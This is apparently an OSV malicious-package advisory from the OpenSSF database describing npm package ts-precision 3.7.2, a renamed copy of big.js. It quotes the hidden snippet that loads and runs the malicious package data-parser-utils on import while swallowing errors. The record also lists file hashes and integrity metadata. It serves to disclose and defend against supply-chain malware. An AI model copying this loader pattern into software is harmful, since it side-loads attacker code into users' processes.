{"id":"MAL-2026-6469","summary":"Malicious code in ts-precision (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c)\nPackage ships a verbatim copy of big.js v7.0.1 (including the original author metadata 'Michael Mclaughlin \u003cM8ch88l@gmail.com\u003e' and repo reference MikeMcl/big.js) under a different name, mimicking a legitimate arbitrary-precision math library to lure installers. Hidden between math methods in the module body is an unrelated block: `try { const doc = require(\"data-parser-utils\"); doc.from_str().then(e =\u003e { }).catch(e =\u003e { }) } catch (error) { }`. This block fires on every `require('ts-precision')` / `import` of the package, pulling in and invoking the known-malicious npm package `data-parser-utils`, with errors silently swallowed in an empty try/catch and no-op promise handlers to hide failures from the consumer. The dependency invocation is unrelated to decimal arithmetic and exists solely to side-load attacker-controlled code into any consumer's process at module load.\n","modified":"2026-06-25T18:31:24.720246438Z","published":"2026-06-25T18:11:56Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-007525","import_time":"2026-06-25T18:17:38.177326218Z","modified_time":"2026-06-25T18:11:56Z","sha256":"e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c","source":"amazon-inspector","versions":["3.7.2"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-precision/v/3.7.2"}],"affected":[{"package":{"name":"ts-precision","ecosystem":"npm","purl":"pkg:npm/ts-precision"},"versions":["3.7.2"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"4e4f951802cfc3b04a4e1d44353a360afce53a687163be32fa5360b43ea86674","tlsh":"03c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc","path":"big.js"},{"path":"package.json","sha256":"7b5b152905601ce985c7d4e8c912fd0e79655222935c785079b5aa1d8a5c4620","tlsh":"1d210463c9a19da70af85b94bcac03aaf1151b1f40a08c5bb07b130c5f3355b2095b7d"}],"package_integrity":[{"filename":"ts-precision-3.7.2.tgz","hashes":{"sha1":"9ff147230bba976bc169b247c4d0d84ea8254261","sha512_sri":"sha512-qeaZg4tesKgUjURYBWfdXHktdEgFeA70MWmdfo9Nixy9wnR+EknggmG17LFuXvpAgrpkjS0n7RAYNNozbjm/Ow=="}}]},"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-precision/MAL-2026-6469.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}